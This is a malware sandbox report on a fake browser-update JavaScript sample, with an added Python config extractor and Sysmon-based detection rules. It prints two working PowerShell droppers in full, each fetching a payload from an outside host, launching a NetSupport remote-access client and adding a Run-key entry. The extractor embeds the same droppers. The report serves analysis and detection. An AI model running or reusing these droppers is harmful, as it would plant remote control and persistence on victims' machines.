
General

  • Target

    16042024_2042_Update_123.0.6312.107.js

  • Size

    16.0MB

  • Sample

    240416-pyb64sae72

  • MD5

    247bb3685fe1544f0f899f8df2db38cd

  • SHA1

    6f6d97f854c901f2d32ad81df6c62ce5e6c4a25a

  • SHA256

    be84be78a5ff8b06efa417f9a69b0eceafbe07bd2e61db88c4bac5757e38b5df

  • SHA512

    98970cc7d0d46d1042bb7b2c3f531954e9140a9ee97fbe987779979b996a1501203c1c8cebec6bf7a5880cd56b8c77330e2ebc1c59b152377e1331b6f239c867

  • SSDEEP

    49152:f7V7zjCxbzqHlp4LhyN0kghDzLZzjYzYsmCW+8z2V35//9SGGqHm3quVIKXgxcEc:O

Malware Config

Extracted

Language

ps1

Source

$mvrufwdINvjaBX='https://gitkonus.com/data.php?14743';$mKNsLAVABTiEBixU=(New-Object System.Net.WebClient).DownloadString($mvrufwdINvjaBX);$IDWpXBSkLjdaKcBFjAcZeIhDuPJlbG=[System.Convert]::FromBase64String($mKNsLAVABTiEBixU);$zxc = Get-Random -Minimum -10 -Maximum 37; $sFGXXZSceCFKjSbyNLbwKQxPDPgN=[System.Environment]::GetFolderPath('ApplicationData')+'\DIVX'+$zxc;if (!(Test-Path $sFGXXZSceCFKjSbyNLbwKQxPDPgN -PathType Container)) { New-Item -Path $sFGXXZSceCFKjSbyNLbwKQxPDPgN -ItemType Directory };$p=Join-Path $sFGXXZSceCFKjSbyNLbwKQxPDPgN 'BB.zip';[System.IO.File]::WriteAllBytes($p,$IDWpXBSkLjdaKcBFjAcZeIhDuPJlbG);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$sFGXXZSceCFKjSbyNLbwKQxPDPgN)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $sFGXXZSceCFKjSbyNLbwKQxPDPgN 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$AZ=Get-Item $sFGXXZSceCFKjSbyNLbwKQxPDPgN -Force; $AZ.attributes='Hidden';$s=$sFGXXZSceCFKjSbyNLbwKQxPDPgN+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='OFFICEC';$DS='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $DS;

URLs
ps1.dropper

https://gitkonus.com/data.php?14743

exe.dropper

https://gitkonus.com/data.php?14743

Extracted

Language

ps1

Source

$GisllGHetRbgcxJDohrnQlSu='https://gitkonus.com/data.php?13475';$cJXOKbiGzcZLwzYMkm=(New-Object System.Net.WebClient).DownloadString($GisllGHetRbgcxJDohrnQlSu);$WINfoGTtEnOrLodz=[System.Convert]::FromBase64String($cJXOKbiGzcZLwzYMkm);$zxc = Get-Random -Minimum -10 -Maximum 37; $sdbsbMLDhyAhBtjBE=[System.Environment]::GetFolderPath('ApplicationData')+'\DIVX'+$zxc;if (!(Test-Path $sdbsbMLDhyAhBtjBE -PathType Container)) { New-Item -Path $sdbsbMLDhyAhBtjBE -ItemType Directory };$p=Join-Path $sdbsbMLDhyAhBtjBE 'BB.zip';[System.IO.File]::WriteAllBytes($p,$WINfoGTtEnOrLodz);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$sdbsbMLDhyAhBtjBE)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $sdbsbMLDhyAhBtjBE 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$AZ=Get-Item $sdbsbMLDhyAhBtjBE -Force; $AZ.attributes='Hidden';$s=$sdbsbMLDhyAhBtjBE+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='OFFICEC';$DS='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $DS;

URLs
ps1.dropper

https://gitkonus.com/data.php?13475

exe.dropper

https://gitkonus.com/data.php?13475
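
Both extracted scripts above are the same dropper with a different query string on the download URL: fetch a base64 blob, decode it into BB.zip under %APPDATA%\DIVX<n>, unzip, start client32.exe, hide the folder and register the exe under the OFFICEC Run value. The following static config extractor is an added example written for this report; it is not tria.ge's extractor and none of it comes from the sample. It resolves the single-quoted variables and the one string concatenation the script uses (a regex walk, not a PowerShell interpreter, so it only understands the constructs these two scripts contain), and expands the random directory suffix into a concrete hunt list. The FOLDER_ENV mapping, the field names and the candidate_dirs helper are my own choices.

```python
import re
from dataclasses import dataclass, asdict

# Inputs: the two scripts listed under "Malware Config / Extracted" in this report, verbatim.
SAMPLES = {
    "14743": r"""$mvrufwdINvjaBX='https://gitkonus.com/data.php?14743';$mKNsLAVABTiEBixU=(New-Object System.Net.WebClient).DownloadString($mvrufwdINvjaBX);$IDWpXBSkLjdaKcBFjAcZeIhDuPJlbG=[System.Convert]::FromBase64String($mKNsLAVABTiEBixU);$zxc = Get-Random -Minimum -10 -Maximum 37; $sFGXXZSceCFKjSbyNLbwKQxPDPgN=[System.Environment]::GetFolderPath('ApplicationData')+'\DIVX'+$zxc;if (!(Test-Path $sFGXXZSceCFKjSbyNLbwKQxPDPgN -PathType Container)) { New-Item -Path $sFGXXZSceCFKjSbyNLbwKQxPDPgN -ItemType Directory };$p=Join-Path $sFGXXZSceCFKjSbyNLbwKQxPDPgN 'BB.zip';[System.IO.File]::WriteAllBytes($p,$IDWpXBSkLjdaKcBFjAcZeIhDuPJlbG);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$sFGXXZSceCFKjSbyNLbwKQxPDPgN)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $sFGXXZSceCFKjSbyNLbwKQxPDPgN 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$AZ=Get-Item $sFGXXZSceCFKjSbyNLbwKQxPDPgN -Force; $AZ.attributes='Hidden';$s=$sFGXXZSceCFKjSbyNLbwKQxPDPgN+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='OFFICEC';$DS='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $DS;""",
    "13475": r"""$GisllGHetRbgcxJDohrnQlSu='https://gitkonus.com/data.php?13475';$cJXOKbiGzcZLwzYMkm=(New-Object System.Net.WebClient).DownloadString($GisllGHetRbgcxJDohrnQlSu);$WINfoGTtEnOrLodz=[System.Convert]::FromBase64String($cJXOKbiGzcZLwzYMkm);$zxc = Get-Random -Minimum -10 -Maximum 37; $sdbsbMLDhyAhBtjBE=[System.Environment]::GetFolderPath('ApplicationData')+'\DIVX'+$zxc;if (!(Test-Path $sdbsbMLDhyAhBtjBE -PathType Container)) { New-Item -Path $sdbsbMLDhyAhBtjBE -ItemType Directory };$p=Join-Path $sdbsbMLDhyAhBtjBE 'BB.zip';[System.IO.File]::WriteAllBytes($p,$WINfoGTtEnOrLodz);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$sdbsbMLDhyAhBtjBE)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $sdbsbMLDhyAhBtjBE 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$AZ=Get-Item $sdbsbMLDhyAhBtjBE -Force; $AZ.attributes='Hidden';$s=$sdbsbMLDhyAhBtjBE+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='OFFICEC';$DS='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $DS;""",
}

# Environment.SpecialFolder names rendered as the shell variable a hunter searches with (my mapping).
FOLDER_ENV = {"ApplicationData": "%APPDATA%", "LocalApplicationData": "%LOCALAPPDATA%",
              "UserProfile": "%USERPROFILE%"}

LITERAL_ASSIGN = re.compile(r"\$(\w+)\s*=\s*'([^']*)'")                  # $k='...'
CONCAT_ASSIGN = re.compile(r"\$(\w+)\s*=\s*\$(\w+)\s*\+\s*'([^']*)'")    # $s=$dir+'\x.exe'
DROP_DIR = re.compile(r"\$(\w+)\s*=\s*\[System\.Environment\]::GetFolderPath\('(\w+)'\)"
                      r"\s*\+\s*'([^']*)'\s*\+\s*\$(\w+)")
RANDOM = re.compile(r"\$(\w+)\s*=\s*Get-Random\s+-Minimum\s+(-?\d+)\s+-Maximum\s+(-?\d+)")
DOWNLOAD = re.compile(r"DownloadString\(\$(\w+)\)")
JOIN_PATH = re.compile(r"Join-Path\s+\$(\w+)\s+'([^']*)'")
RUN_KEY = re.compile(r"New-ItemProperty\s+-Path\s+\$(\w+)\s+-Name\s+\$(\w+)\s+-Value\s+\$(\w+)")
HIDDEN = re.compile(r"\.attributes\s*=\s*'Hidden'")


@dataclass(frozen=True)
class DropperConfig:
    download_url: str
    payload_encoding: str
    drop_dir: str            # rendered with a <n> placeholder for the random suffix
    dir_suffix_range: tuple  # inclusive (low, high) that Get-Random can produce
    archive_name: str
    executable: str
    run_key: str
    run_value_name: str
    run_value_data: str
    hides_directory: bool


def _need(pattern, script, what):
    m = pattern.search(script)
    if m is None:
        raise ValueError(f"script does not contain the expected {what}")
    return m


def extract(script: str) -> DropperConfig:
    literals = dict(LITERAL_ASSIGN.findall(script))
    concats = {n: (base, suf) for n, base, suf in CONCAT_ASSIGN.findall(script)}

    dir_var, folder, dir_prefix, rand_var = _need(DROP_DIR, script, "drop directory").groups()
    rv, low, high = _need(RANDOM, script, "Get-Random suffix").groups()
    if rv != rand_var:
        raise ValueError("directory suffix is not the Get-Random variable")
    # Get-Random -Maximum is exclusive, so '-Maximum 37' yields at most 36; negative
    # values are legal and give folder names such as DIVX-7.
    suffix_range = (int(low), int(high) - 1)
    drop_dir = f"{FOLDER_ENV.get(folder, folder)}{dir_prefix}<n>"

    def resolve(var: str) -> str:
        """Follow a variable to its string value through one '+' concatenation."""
        if var in literals:
            return literals[var]
        if var == dir_var:
            return drop_dir
        if var in concats:
            base, suf = concats[var]
            return resolve(base) + suf
        raise KeyError(var)

    url = resolve(_need(DOWNLOAD, script, "DownloadString call").group(1))
    paths = [name for var, name in JOIN_PATH.findall(script) if var == dir_var]
    k, v, data = _need(RUN_KEY, script, "New-ItemProperty Run key").groups()
    return DropperConfig(
        download_url=url,
        payload_encoding="base64" if "FromBase64String" in script else "raw",
        drop_dir=drop_dir, dir_suffix_range=suffix_range,
        archive_name=next(p for p in paths if p.lower().endswith(".zip")),
        executable=next(p for p in paths if p.lower().endswith(".exe")),
        run_key=resolve(k), run_value_name=resolve(v), run_value_data=resolve(data),
        hides_directory=bool(HIDDEN.search(script)),
    )


def candidate_dirs(cfg: DropperConfig) -> list:
    """Every concrete directory name the sample can create, for filesystem hunting."""
    low, high = cfg.dir_suffix_range
    return [cfg.drop_dir.replace("<n>", str(n)) for n in range(low, high + 1)]


def differing_fields(a: DropperConfig, b: DropperConfig) -> set:
    da, db = asdict(a), asdict(b)
    return {f for f in da if da[f] != db[f]}


if __name__ == "__main__":
    configs = {k: extract(s) for k, s in SAMPLES.items()}
    for key, cfg in configs.items():
        print(key, asdict(cfg))
    print("fields that differ:", differing_fields(*configs.values()))
```

Run as-is it prints both configs and reports that only download_url differs, which is why the two tasks can be read as one campaign with per-victim URLs. The 47 DIVX<n> names (DIVX-10 through DIVX36) under each user's AppData\Roaming, plus the OFFICEC value under HKCU\...\Run, are what to sweep for on suspect hosts.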

Targets

    • Target

      16042024_2042_Update_123.0.6312.107.js

    • NetSupport

      NetSupport is a remote access tool sold as legitimate system administration software; the dropper above launches its client32.exe from the DIVX<n> folder and registers it under the OFFICEC Run value.

    • Blocklisted process makes network request

    • Checks computer location settings

      Looks up the country code configured in the registry, likely as a geofence.

    • Executes dropped EXE

    • Loads dropped DLL

    • Adds Run key to start application
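
The signatures above name behaviours rather than showing how to catch them. The following detection logic is an added example, not tria.ge's signature set, and encodes three of them as rules over Sysmon-style events: a script host writing a binary or archive into a user-writable path, a process starting from a file that script host wrote, and a Run value pointing at such a file. The event list is constructed to mirror what the dropper does (plus one benign Run-key write from an installer, to show the rule does not fire on it); field names follow Sysmon (EventID 1 process create, 11 file create, 13 registry value set) but every path, SID and hostname-level value is made up.

```python
import re

# Constructed Sysmon-style events modelling the dropper's actions; values are invented.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SID = r"S-1-5-21-1111111111-2222222222-3333333333-1001"
EVENTS = [
    {"EventID": 11, "Image": PS, "TargetFilename": r"C:\Users\victim\AppData\Roaming\DIVX-3\BB.zip"},
    {"EventID": 11, "Image": PS, "TargetFilename": r"C:\Users\victim\AppData\Roaming\DIVX-3\client32.exe"},
    {"EventID": 1, "Image": r"C:\Users\victim\AppData\Roaming\DIVX-3\client32.exe", "ParentImage": PS},
    {"EventID": 13, "Image": PS,
     "TargetObject": rf"HKU\{SID}\Software\Microsoft\Windows\CurrentVersion\Run\OFFICEC",
     "Details": r"C:\Users\victim\AppData\Roaming\DIVX-3\client32.exe"},
    # Benign noise: an installer registering its own tray app from Program Files.
    {"EventID": 13, "Image": r"C:\Program Files\Vendor\setup.exe",
     "TargetObject": rf"HKU\{SID}\Software\Microsoft\Windows\CurrentVersion\Run\VendorTray",
     "Details": r"C:\Program Files\Vendor\tray.exe"},
]

SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
RUN_KEY = re.compile(r"\\Software\\Microsoft\\Windows\\CurrentVersion\\Run(Once)?\\", re.I)
USER_WRITABLE = re.compile(r"\\AppData\\(Roaming|Local)\\|\\Users\\Public\\|\\ProgramData\\", re.I)
DROPPED_EXT = (".exe", ".dll", ".zip", ".scr", ".ps1", ".js")


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def detect(events):
    """Walk events in order, remembering files a script host wrote so that later
    process-create and Run-key events can be tied back to them. Returns (rule, event)."""
    dropped = set()
    hits = []
    for ev in events:
        eid = ev["EventID"]
        if eid == 11 and basename(ev["Image"]) in SCRIPT_HOSTS \
                and USER_WRITABLE.search(ev["TargetFilename"]):
            path = ev["TargetFilename"].lower()
            dropped.add(path)
            if path.endswith(DROPPED_EXT):
                hits.append(("script_host_drops_binary", ev))
        elif eid == 1 and ev["Image"].lower() in dropped:
            hits.append(("executes_dropped_exe", ev))
        elif eid == 13 and RUN_KEY.search(ev["TargetObject"]):
            data = ev["Details"].lower()
            # Fire on a Run value that points at a file we saw dropped, at any
            # user-writable path, or that was written by a script host.
            if data in dropped or USER_WRITABLE.search(data) \
                    or basename(ev["Image"]) in SCRIPT_HOSTS:
                hits.append(("run_key_to_dropped_or_user_writable", ev))
    return hits


def summarize(hits) -> dict:
    counts = {}
    for rule, _ in hits:
        counts[rule] = counts.get(rule, 0) + 1
    return counts


if __name__ == "__main__":
    for rule, ev in detect(EVENTS):
        print(rule, ev["EventID"], ev.get("TargetFilename") or ev.get("TargetObject") or ev["Image"])
    print(summarize(detect(EVENTS)))
```

The correlation through the dropped set is the point: the Run-key rule fires on the OFFICEC write because its data is a file powershell.exe just created, while the installer's VendorTray entry, which points into Program Files and was written by setup.exe, stays quiet.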

MITRE ATT&CK Enterprise v15

Tasks
